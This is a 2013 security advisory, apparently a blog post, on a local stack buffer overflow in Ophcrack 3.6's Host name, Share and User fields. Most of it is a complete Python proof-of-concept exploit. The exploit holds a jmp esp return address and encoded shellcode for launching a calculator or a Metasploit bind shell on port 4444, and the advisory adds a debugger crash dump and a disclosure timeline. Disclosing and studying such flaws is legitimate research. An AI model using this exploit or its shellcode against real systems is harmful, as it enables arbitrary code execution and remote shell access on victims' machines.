Ophcrack Local Stack Based Buffer Overflow

1. Advisory Information

Title: Ophcrack 3.6 Local Stack Based Buffer Overflow
Advisory URL: https://osandamalith.com/2013/12/28/ophcrack-local-stack-based-buffer-overflow
Date published: 2013-12-29
Vendors contacted: OBJECTIF SÉCURITÉ
Release mode: User release

2. Vulnerability Information

Class: Buffer Overflow [CWE-119]
Impact: Code Execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: N/A

3. Summary

Opcrack is a password cracker based on rainbow tables, a method that makes it possible to speed up the cracking process by using the result of calculations done in advance and stored rainbow tables.

4. Vulnerability Description

Ophcrack contains an overflow condition that is triggered as user-supplied input is not properly validated when passed via the ‘Host name:’, ‘Share:’, ‘User:’ fields. This may allow a local attacker to cause a stack-based buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code. Failure to exploit this vulnerability may cause denial of service.

5. Vulnerable Packages

  • 3.6
  • Older Versions might be vulnerable as well, they were not tested

6. Credits

This bug was researched and proof of concept exploit by Osanda Malith Jayathissa.

7. Proof of Concept / Technical Details

The EIP register is overwritten by our supplied arbitrary buffer.

[code language=”c”]
(1bbc.17c8): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ffffffff ebx=41414141 ecx=75d83d66 edx=00330dc0 esi=41414141 edi=41414141
eip=41414141 esp=002895a0 ebp=41414141 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
41414141 ?? ???
[/code]

poc

Proof of concept exploit code.

[code language=”python”]
#!/usr/bin/python
# Title: Ophcrack 3.6 Local Stack Based Buffer Overflow
# Version: 3.6
# Tested on: Windows XP SP2 en, Windows 8 64-bit
# Vendor: http://ophcrack.sourceforge.net/
# Software Link: http://sourceforge.net/projects/ophcrack/files/ophcrack/3.6.0/ophcrack-win32-installer-3.6.0.exe
# Original Advisory: https://osandamalith.com/2013/12/29/ophcrack-local-stack-based-buffer-overflow/
# E-Mail: osandajayathissa@gmail.com
# Exploit-Author: Osanda Malith
# Twitter: @OsandaMalith
# /!\ Author is not responsible for any damage you cause
# This POC is for educational purposes only
# Video: https://www.youtube.com/watch?v=YPPIyxPMakI
”’
This exploit is super lame, as no user is going to paste 1000 characters
of text into the textbox, however it could potentially be used for
privilege escalation. It was still a fun learning exercise.
”’
”’
To exploit this bug open Ophcrack -> Click Load -> Remote SAM
There are three fields "Host name:", "Share:", "User:"
All three fields are vulnerable. I have made this exploit to work on those 3 fields.
Copy the contents written to the file into the specific field you selected and click ok.
”’
print ”’

_/_/ _/ _/
_/ _/ _/_/_/ _/_/_/ _/_/_/ _/ _/_/ _/_/_/ _/_/_/ _/ _/
_/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/_/
_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/
_/_/ _/_/_/ _/ _/ _/_/_/ _/ _/_/_/ _/_/_/ _/ _/
_/
_/

[+] Opchrack 3.6 Local Buffer Overflow Exploit
[+] Author: Osanda Malith Jayathissa < osandajayathissa [at] gmail.com >
[~] Special Thanks to Matt "hostess" Andreko < mandreko [at] accuvant.com >

”’
while True:
try:
choice = int(raw_input("[?] In which field do you want to inject our payload?\n1.Host name\n2.Share\n3.User\n"))
except ValueError:
print "[!] Enter only a number"
continue
# If you select "Host name" you would get a error after injecting. Click "Don’t send" and enjoy the payload
if choice == 1:
buff = "A" * 497
break
elif choice == 2:
buff = "A" * 504
break
elif choice == 3:
buff = "A" * 504
break
else:
print "[-] Invalid Choice"
continue
# jmp instruction must be ‘ascii’ due to character set restrictions
# jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.8.4.0 (C:\Program Files\ophcrack\QtCore4.dll)
eip = "\x39\x5b\x2b\x6e"

while True:
try:
choice = int(raw_input("[?] Choose your payload:\n1.Calculator\n2.Bind Shell\n"))
except Exception, e:
print "[!] Enter only a number"
continue

if choice == 1:
#ALPHA3.py esp –input="shellcode.bin"
shellcode = "TYhffffk4diFkDql02Dqm0D1CuEE0l3i8o3J378P4P8L4u8L3g0f3A0B1n2K405o7N5K328O4E3T4I0g"
shellcode += "0c1k0Q4M358P5M4y0I2Z3g3I3E3E2j4C2r110H135l0p0H7o381M0E0s3i4Z3D4p5k2C1l335N4R4L4D"
shellcode += "3w4X4H1L4p2n3R3M3L3C2x4s8o4H3M8N4y3J4P3j4S1k3b3L0h2r08125o1K0b1o101P0514373A1o0Z"
shellcode += "3O340Q0O0n5n4F4B8n4X1k0i4u4m0S407o0c1m4m4P5M2y135O1K0V1l4z3D0G3S0h120C4I183B0y14"
shellcode += "3h4H3G8K3S1L2k3E4r162Z3E7k5O138P5L3H0O0c0T15034I0v3M3P4H3h0Z2H3w3h3C002k7l4L3J1L"
shellcode += "2F3h0w3q0b8O3u2q064O1p4K3w0P3S0w1N2O2B043K0K7p3r4n1k2z0p017k0F3p4Y0u093d301n0n"
break
elif choice == 2:
# Thanks to Matt for teaching me about choosing correct shellcode 🙂
# Modify this part with your own custom shellcode
# msfpayload windows/shell/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t c BufferRegister=ESP
shellcode = (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x69\x78\x4e\x69\x73\x30"
"\x65\x50\x47\x70\x71\x70\x6f\x79\x39\x75\x74\x71\x78\x52\x31"
"\x74\x6e\x6b\x70\x52\x50\x30\x4e\x6b\x33\x62\x34\x4c\x4c\x4b"
"\x66\x32\x64\x54\x4c\x4b\x51\x62\x74\x68\x64\x4f\x4e\x57\x51"
"\x5a\x45\x76\x45\x61\x59\x6f\x74\x71\x59\x50\x4e\x4c\x37\x4c"
"\x70\x61\x53\x4c\x56\x62\x76\x4c\x47\x50\x39\x51\x7a\x6f\x56"
"\x6d\x46\x61\x6a\x67\x78\x62\x7a\x50\x70\x52\x46\x37\x4e\x6b"
"\x52\x72\x76\x70\x6e\x6b\x37\x32\x65\x6c\x43\x31\x4a\x70\x4c"
"\x4b\x71\x50\x54\x38\x4c\x45\x59\x50\x62\x54\x50\x4a\x45\x51"
"\x6e\x30\x32\x70\x6e\x6b\x71\x58\x46\x78\x6c\x4b\x50\x58\x31"
"\x30\x65\x51\x49\x43\x38\x63\x47\x4c\x32\x69\x4c\x4b\x54\x74"
"\x6c\x4b\x37\x71\x58\x56\x46\x51\x69\x6f\x56\x51\x39\x50\x4e"
"\x4c\x5a\x61\x6a\x6f\x76\x6d\x46\x61\x68\x47\x57\x48\x6d\x30"
"\x31\x65\x6c\x34\x53\x33\x73\x4d\x39\x68\x67\x4b\x31\x6d\x64"
"\x64\x43\x45\x58\x62\x51\x48\x4c\x4b\x53\x68\x61\x34\x66\x61"
"\x6a\x73\x35\x36\x6c\x4b\x44\x4c\x42\x6b\x6e\x6b\x71\x48\x67"
"\x6c\x33\x31\x6b\x63\x6c\x4b\x47\x74\x4e\x6b\x55\x51\x6a\x70"
"\x4e\x69\x63\x74\x67\x54\x47\x54\x71\x4b\x43\x6b\x45\x31\x76"
"\x39\x52\x7a\x73\x61\x69\x6f\x6b\x50\x32\x78\x63\x6f\x72\x7a"
"\x4c\x4b\x36\x72\x58\x6b\x6d\x56\x61\x4d\x62\x48\x65\x63\x50"
"\x32\x45\x50\x35\x50\x31\x78\x64\x37\x54\x33\x76\x52\x43\x6f"
"\x63\x64\x50\x68\x50\x4c\x54\x37\x37\x56\x65\x57\x59\x6f\x48"
"\x55\x6f\x48\x6a\x30\x76\x61\x45\x50\x53\x30\x66\x49\x6f\x34"
"\x30\x54\x32\x70\x75\x38\x37\x59\x6b\x30\x30\x6b\x57\x70\x49"
"\x6f\x68\x55\x56\x30\x42\x70\x50\x50\x32\x70\x31\x50\x36\x30"
"\x73\x70\x50\x50\x35\x38\x68\x6a\x74\x4f\x49\x4f\x69\x70\x39"
"\x6f\x39\x45\x4c\x49\x6a\x67\x55\x61\x59\x4b\x56\x33\x52\x48"
"\x74\x42\x47\x70\x56\x71\x33\x6c\x4e\x69\x39\x76\x31\x7a\x64"
"\x50\x52\x76\x56\x37\x32\x48\x59\x52\x59\x4b\x37\x47\x55\x37"
"\x79\x6f\x4a\x75\x50\x53\x50\x57\x31\x78\x68\x37\x7a\x49\x54"
"\x78\x4b\x4f\x59\x6f\x4a\x75\x50\x53\x62\x73\x31\x47\x45\x38"
"\x50\x74\x4a\x4c\x57\x4b\x68\x61\x59\x6f\x4e\x35\x72\x77\x4e"
"\x69\x4b\x77\x65\x38\x52\x55\x50\x6e\x50\x4d\x35\x31\x59\x6f"
"\x5a\x75\x65\x38\x70\x63\x70\x6d\x70\x64\x35\x50\x6f\x79\x79"
"\x73\x61\x47\x72\x77\x43\x67\x70\x31\x68\x76\x53\x5a\x54\x52"
"\x33\x69\x32\x76\x59\x72\x69\x6d\x51\x76\x4f\x37\x70\x44\x47"
"\x54\x45\x6c\x36\x61\x35\x51\x6c\x4d\x43\x74\x75\x74\x62\x30"
"\x49\x56\x73\x30\x42\x64\x63\x64\x52\x70\x63\x66\x30\x56\x70"
"\x56\x43\x76\x63\x66\x72\x6e\x52\x76\x63\x66\x50\x53\x53\x66"
"\x63\x58\x52\x59\x4a\x6c\x65\x6f\x4f\x76\x49\x6f\x48\x55\x6b"
"\x39\x79\x70\x70\x4e\x72\x76\x30\x46\x79\x6f\x44\x70\x50\x68"
"\x33\x38\x4e\x67\x45\x4d\x51\x70\x39\x6f\x58\x55\x6f\x4b\x59"
"\x70\x35\x4d\x37\x5a\x75\x5a\x31\x78\x6f\x56\x7a\x35\x4d\x6d"
"\x6f\x6d\x79\x6f\x38\x55\x67\x4c\x57\x76\x73\x4c\x65\x5a\x6f"
"\x70\x49\x6b\x6b\x50\x74\x35\x66\x65\x6d\x6b\x31\x57\x72\x33"
"\x61\x62\x70\x6f\x32\x4a\x37\x70\x56\x33\x59\x6f\x69\x45\x41"
"\x41")
print "[+] Connect on port 4444"
break
else:
print "[-] Invalid Choice"
continue

junk = "A" * 100
# Glad to write this at 17 😉
# Combine strings
exploit = buff + eip + shellcode + junk
print "[+] Writing to file >> exploit.txt"
# Write it out to file
file = open("exploit.txt", "w")
file.write(exploit)
file.close()
print "[~] " + str(len(exploit)) + " Bytes written to file"
print "[+] Copy all the contents inside the file into the field you selected and click ok"
#EOF

[/code]


8. Report Timeline

2013-12-28: The researcher notifies the vendor OBJECTIF SÉCURITÉ.
2013-12-29: Vendor confirms that it is not a big issue as the risk is low in exploiting. But would patch it in the next release and acknowledge.
2013-12-29: Public advisory released

9.  Disclaimer 

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

10. References

[1] http://packetstormsecurity.com/files/124622

6 thoughts on “Ophcrack Local Stack Based Buffer Overflow

Leave a Reply